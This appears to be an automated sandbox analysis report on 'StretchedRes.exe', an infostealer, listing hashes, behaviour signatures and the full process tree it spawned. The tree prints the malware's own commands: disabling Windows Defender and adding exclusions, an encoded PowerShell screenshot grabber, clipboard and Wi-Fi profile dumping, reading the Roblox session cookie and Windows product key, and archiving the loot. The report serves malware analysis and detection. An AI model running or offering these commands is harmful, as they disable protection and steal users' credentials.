Analysis

  • max time kernel
    94s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2024 14:41

General

  • Target

    StretchedRes.exe

  • Size

    9.2MB

  • MD5

    f2d78274da673584d4c82ada661228a5

  • SHA1

    d713c8dfa4ffc7bdd61b3befa7f165013e70c5c1

  • SHA256

    8816cff29c01055e02589acf592847a3980ad5dd2868fc795f7179e5f7abdfd6

  • SHA512

    586aaa41283f0b8dac08fc6b1b43e6e45a3d94eb7292dd5de59893095674fcd84b102622c96d9e41231c845d2399230a38c2ff921f1d959cd5da4ab7251731d7

  • SSDEEP

    196608:FAunqZVyXStI4yvsBSy3vfwfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oSQ:dyGhOf0IH2XgHq+jq93Yop

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\StretchedRes.exe
    "C:\Users\Admin\AppData\Local\Temp\StretchedRes.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3584
    • C:\Users\Admin\AppData\Local\Temp\StretchedRes.exe
      "C:\Users\Admin\AppData\Local\Temp\StretchedRes.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\StretchedRes.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\StretchedRes.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5024
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2468
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3856
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3436
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3036
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4360
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2452
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4148
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1884
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:1896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4672
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3332
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3476
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3844
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:1712
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:1652
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4256
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:1396
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2448
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2264
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ohibqxe1\ohibqxe1.cmdline"
              5⤵
                PID:4556
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE6E.tmp" "c:\Users\Admin\AppData\Local\Temp\ohibqxe1\CSC12D7EE4DE69C46DB94BC5DEA3743DC7E.TMP"
                  6⤵
                    PID:920
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:408
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:3580
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4888
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4008
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:4772
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2564
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:4492
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:216
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:3544
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:4768
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:2756
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4088
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:3472
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3856
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "getmac"
                                  3⤵
                                    PID:2468
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:972
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35842\rar.exe a -r -hp"tadyleak" "C:\Users\Admin\AppData\Local\Temp\BvmgI.zip" *"
                                      3⤵
                                        PID:2476
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI35842\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI35842\rar.exe a -r -hp"tadyleak" "C:\Users\Admin\AppData\Local\Temp\BvmgI.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:3920
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:4980
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            4⤵
                                              PID:2564
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic os get Caption
                                              4⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2932
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                            3⤵
                                              PID:3944
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic computersystem get totalphysicalmemory
                                                4⤵
                                                  PID:4504
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                3⤵
                                                  PID:3568
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic csproduct get uuid
                                                    4⤵
                                                      PID:2448
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                    3⤵
                                                      PID:2300
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3116
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                      3⤵
                                                        PID:232
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic path win32_VideoController get name
                                                          4⤵
                                                          • Detects videocard installed
                                                          PID:1884
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                        3⤵
                                                          PID:2988
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4392

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                      SHA1

                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                      SHA256

                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                      SHA512

                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      944B

                                                      MD5

                                                      cadef9abd087803c630df65264a6c81c

                                                      SHA1

                                                      babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                                      SHA256

                                                      cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                                      SHA512

                                                      7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

